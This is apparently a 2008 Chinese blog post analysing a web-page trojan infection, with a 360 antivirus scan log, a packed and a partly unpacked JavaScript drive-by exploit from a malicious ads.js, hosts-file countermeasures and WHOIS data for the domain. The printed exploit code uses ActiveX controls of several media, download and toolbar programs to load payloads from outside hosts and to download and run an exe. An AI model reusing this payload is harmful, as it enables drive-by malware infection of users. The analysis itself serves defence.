u.asdafdgfgf.com不完全查杀记录『Fax 2Client为你带来的礼物』

好不容易抓到个中奖的机子(其他机子都打补丁啦,就有两个没打过补丁!!后来挪进来的机子)

360安全卫士木马查杀历史报告

木马名称:恶意干扰对象
路径:C:\WINDOWS\DOWNLO~1\405.exe
查杀时间 :2008-04-21 20:17
木马名称:伪Honey木马下载器
路径:C:\PROGRA~1\COMMON~1\CPUSH\cpush.dll
查杀时间 :2008-04-21 20:17
木马名称:Weiyuan木马程序
路径:C:\windows\system32\weiyuan.exe
查杀时间 :2008-04-21 20:17
木马名称:PWL.LMir木马程序
路径:C:\WINDOWS\system32\inf\svch0st.exe
查杀时间 :2008-04-21 20:17
木马名称:伪linkinfo恶意程序
路径:C:\WINDOWS\linkinfo.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.sua
路径:C:\Program Files\Common Files\CPUSH\Uninst.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.aza
路径:C:\Documents and Settings\Admin\桌面\Microsoft.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.aza
路径:C:\Documents and Settings\Admin\Local Settings\Temporary Internet Files\Content.IE5\A9GNEBU5\m[1].exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan-Spy/Win32.FtpSend.b
路径:C:\Documents and Settings\Admin\Local Settings\Temporary Internet Files\Content.IE5\A9GNEBU5\dat[1].asp
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.laj
路径:C:\Documents and Settings\Admin\Local Settings\Temporary Internet Files\Content.IE5\4B6LWHOV\1[1].exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.sda
路径:C:\Documents and Settings\Admin\Local Settings\Temp\wip.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.aha
路径:C:\Documents and Settings\Admin\Local Settings\Temp\223.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan-Downloader/Win32.QQHelper.bed
路径:C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\6D2RAZC7\ThunderBHONew32[1].dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.AutoRV.aaf
路径:C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KX4NIVW9\an006[1].exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.lag
路径:C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KX4NIVW9\d39[1].exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.SuperKiller.sac
路径:C:\WINDOWS\cec61.txt
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.oah
路径:C:\WINDOWS\cce1.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.AutoRV.aaf
路径:C:\WINDOWS\an006.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.lag
路径:C:\WINDOWS\d39.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Small.hlp[Downloader]
路径:C:\WINDOWS\AppPatch\AcSpecf.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan-Spy/Win32.FtpSend.b
路径:C:\WINDOWS\AppPatch\AcPlugin.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.SuperKiller.sac
路径:C:\WINDOWS\inf\mscomfix.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.laj
路径:C:\WINDOWS\system\zayjhxpRes080419.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.sda
路径:C:\WINDOWS\system32\catclogd.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.HZJ.aba
路径:C:\WINDOWS\system32\dyylns80.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.lae
路径:C:\WINDOWS\system32\wicheck080411.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.SuperKiller.sac
路径:C:\WINDOWS\system32\inf\mscomfix.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.laj
路径:C:\WINDOWS\system32\inf\scrsyszy080419.scr
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.laj
路径:C:\WINDOWS\system32\1.ext
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.FtpSend.a[SPY]
路径:C:\WINDOWS\system32\drivers\eth8023.sys
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.SuperKiller.sac
路径:C:\WINDOWS\system32\05801.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.SuperKiller.sab
路径:c:\WINDOWS\inf\dev01.inf
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.oac
路径:C:\WINDOWS\system32\wicheck080411.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.oah
路径:C:\WINDOWS\system32\4051.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan-Downloader/Win32.QQHelper.bed
路径:C:\WINDOWS\ThunderBHONew32.dll
查杀时间 :2008-04-21 20:17

很好很全啊,查看过ie记录只有u.asdafdgfgf.com/web/index.htm最可疑,

很猖獗啊,下的木马病毒都还在桌面上放着!

其中一个vb脚本(Chenzi.vbs):

Set Shell = CreateObject(”Wscript.Shell”)
Shell.Run (”Chenzi.exe”)
Set Shell = Nothing

这个是查杀记录,木马很全啊,机器狗哈哈,他还不知道他的狗在这个机子上不管用呢

只是发现这个机子有问题就去看看的,估计是被dns欺骗的时候中招的,那个木马制造者也太猖狂啦竟然把木马赫赫的摆在桌面上!恐怕我不知道机子中呢?脑残?

这个之所以叫做不完全查杀记录是因为我只是看看病毒是怎么进来的,还有病毒都构成哪些危害,并不确定360在机子重启后就把病毒清除干净。

重启后我自然是打开还原打上补丁重新做过备份开启360自我保护加全保护了以防万一嘛。

『u.asdafdgfgf.com/ads.js分析,临时解决办法』百度怎么啦,还是我怎么啦,还是…

不清楚是不是百度出问题啦,总之打开其他网页都是正常的现在,就是百度打开显示不了,要刷新(重试)几遍才会出来,再刷新就又没啦,不知道是不是我的机子有问题(现在没发现可疑情况啊!)还是我处的网络有问题(至少局域网中现在就我一人在线!)!

为啦方便我就直接把图片这样插入啦,需要的话就点开看吧,不需要就直接下文。

假象就是假象,qq使用的最多,现在局域网中也并不是我一人在线,因为在此查看攻击记录最后一次攻击的时间是23:55而我访问百度的时间也大概是这个时间,现在是当前时间:  0:08:43.92 。可惜他不能利用我的漏洞。

下边看看这个漏洞利用js代码:

eval(function(p,a,c,k,e,d){while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+c+’\\b’,’g’),k[c])}}return p}(’18(7.41.57(\’43\’)==-1){23{8 38;8 39=(7.56(“10”));39.55(“54″,”58:53-59-64-63-62”);8 61=39.65(“49.46″,””)}20(38){};27{8 32=22 44();32.45(32.52()+24*60*60*51);7.41=\’43=50;47=/;32=\’+32.48();7.14(“<16 25=9://11.12.13/6.26><\\/16>”);18(38!=”[10 15]”){7.14(“<16 25=9://11.12.13/1.26><\\/16>”)}82{23{8 36;8 81=22 30(“80.79″)}20(36){};27{18(36!=”[10 15]”){7.14(“<16 25=9://11.12.13/2.26><\\/16>”);7.14(“<17 21=\\”28: 31(\’9://11.12.13/19.29\’)\\”></17>”)}}23{8 37;8 83=22 30(“84.85.1″)}20(37){};27{18(37!=”[10 15]”){7.14(“<16 25=9://11.12.13/3.26><\\/16>”);7.14(“<17 21=\\”28: 31(\’9://11.12.13/19.29\’)\\”></17>”)}}23{8 35;8 77=22 30(“78.70″)}20(35){};27{18(35!=”[10 15]”){7.14(“<16 25=9://11.12.13/4.26><\\/16>”);7.14(“<17 21=\\”28: 31(\’9://11.12.13/19.29\’)\\”></17>”)}}23{8 33;8 66=22 30(“69.68.1″)}20(33){};27{18(33!=”[10 15]”){7.14(“<42 21=67:71 25=9://11.12.13/5.26></42>”)}}23{8 34;8 40=22 30(“72.76″)}20(34){};27{18(34!=”[10 15]”){40.75(“9://11.12.13/19/19.74″,”19.73”,0);7.14(“<17 21=\\”28: 31(\’9://11.12.13/19.29\’)\\”></17>”)}}18(36==”[10 15]”&&37==”[10 15]”&&35==”[10 15]”&&33==”[10 15]”&&34==”[10 15]”){7.14(“<17 21=\\”28: 31(\’9://11.12.13/19.29\’)\\”></17>”)}}}}’,10,86,’|||||||document|var|http|object|k|222360|com|write|Error|script|DIV|if|ads|catch|style|new|try||src|gif|finally|CURSOR|c|ActiveXObject|url|expires|i|j|h|f|g|e|ado|obj|cookie|iframe|OKSUN|Date|setTime|Stream|path|toGMTString|Adodb|SUN|1000|getTime|BD96C556|classid|setAttribute|createElement|indexOf|clsid|65A3||as|00C04FC29E36|983A|11D0|createobject|yahoo|display|GLChatCtrl|GLCHAT|Vod|none|BaiduBar|exe|cab|DloadDS|Tool|thunder|DPClient|StormPlayer|MPS|storm|else|pps|POWERPLAYER|PowerPlayerCtrl’.split(‘|’)))

这个一句太长啦哈,“加密”的很好厄,把eval替换为document.write偶只能看到一部分解密的代码:

// –>

// –>if(document.cookie.indexOf(‘OKSUN’)==-1){try{var e;var

ado=(document.createElement(“object”));

ado.setAttribute(“classid”,”clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″);var

as=ado.createobject(“Adodb.Stream”,””)}catch(e){};finally{var expires=new

Date();expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie=’OKSUN=SUN;path=/;expires=’+expires.toGMTString();document.write(”

很好很强大的代码!利用的漏洞多为第三方程序(聊天工具,工具条,下载工具,多媒体播放程序)漏洞:

|yahoo|display|GLChatCtrl|GLCHAT|Vod|none|BaiduBar|exe|cab|DloadDS|Tool|thunder|DPClien

t|StormPlayer|MPS|storm|else|pps|POWERPLAYER|PowerPlayerCtrl’

下载地址应该在|k|222360|com这里,所以host过滤的时候也不要忘记搞掉这个k.222360.com下载的文件不光是exe文件还有cab类型的插件。所以建议开启杀软的实时监控或者开启网页漏洞利用功能(比如卡卡和360的网页防漏功能,还是微点好用呢!!)最好把这个域名加入“受限制站点”然后设定安全级别为高。

目前没有病毒样本(因为不是我中病毒啦),没有虚拟机也不好去让他中上搞到个样本!!似乎这个漏洞利用代码还没有完成的很好,因为只看到利用百度工具条(百度超级搜霸5.4(Version of “BaiduBar.dll” is 2.0.2.144))的漏洞,

其他的三个,暴风影音,PPS,迅雷,雅虎通的漏洞利用代码都去掉啦,只是输出document.write(“”),

也就是除啦利用百度搜霸的外其他的漏洞都没作用?。

http://k.222360.com/ads/ads.cab病毒文件,下载后的名字是ads.exe?

具体临时解决办法:

host过滤吧

127.0.0.1       asdafdgfgf.com

127.0.0.1       222360.com

127.0.0.1       u.asdafdgfgf.com/ads.js

127.0.0.1       k.222360.com

127.0.0.1       k.222360.com/ads/ads.cab

还有不放心的话可以把这个域名加进受限网址,和360的黑名单网站,来做进一步过滤。

释然,不是百度出问题啦,而是偶所在网络出问题啦,至少他现在拦截百度的页面拦截QQ相关的页面,

拦截木屑游戏(天龙八部的公告,问道的公告)的页面,其他的还没发现。

另外这个挂马代码也不是什么新东西啦,只是被“加密(使用正则表达式)”后拿出来罢啦,挂马代码:

function init(){document.write();} window.onload = init; if(document.cookie.indexOf(‘OK’)==-1){ try{var e; var ado=(document.createElement(“object”)); ado.setAttribute(“classid”,”clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″); var as=ado.createobject(“Adodb.Stream”,””)} catch(e){}; finally{ var expires=new Date(); expires.setTime(expires.getTime()+24*60*60*1000); document.cookie=’ce=windowsxp;path=/;expires=’+expires.toGMTString(); if(e!=”[object Error]”){ document.write(“<script src=http:\/\/aXXa.18XXdXXd.net\/aa\/1.js><\/script>”)} else{ try{var f;var storm=new ActiveXObject(“MPS.StormPlayer”);} catch(f){}; finally{if(f!=”[object Error]”){ document.write(“<script src=http://xxxxxxxxxx/2.js><\/script>”)}} try{var g;var pps=new ActiveXObject(“POWERPLAYER.PowerPlayerCtrl.1″);} catch(g){}; finally{if(g!=”[object Error]”){ document.write(“<script src=http:/:xxxxxxxxxx/3.js><\/script>”)}} try{var h;var obj=new ActiveXObject(“BaiduBar.Tool”);} catch(h){}; finally{if(h!=”[object Error]”){ obj.DloadDS(“http:/:xxxxxxxxxx/xx.exe”, “bd.exe”, 0)}} }}}

这个通用的,exp的的js调用就不同啦。

Registration Service Provided By: eNom, Inc.
Contact: etpreseller@gmail.com
Visit: www.enom.com

Domain name: asdafdgfgf.com

Registrant Contact:
Zhang san
Zhang San (net1363@126.com)
+86.7505588888
Fax: +86.7505580000
Fujian province,Xiamen City
Xiamen, Hongkong 100000
CN

Administrative Contact:
Zhang san
Zhang San (net1363@126.com)
+86.7505588888
Fax: +86.7505580000
Fujian province,Xiamen City
Xiamen, Hongkong 100000
CN

Technical Contact:
Zhang san
Zhang San (net1363@126.com)
+86.7505588888
Fax: +86.7505580000
Fujian province,Xiamen City
Xiamen, Hongkong 100000
CN

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

Creation date: 15 Dec 2007 17:44:40
Expiration date: 15 Dec 2008 17:44:40

说的很乱,主要就是从发现——>解密代码——>分析代码——>临时解决办法——>查看这个挂马代码的本来面目这样一个过程。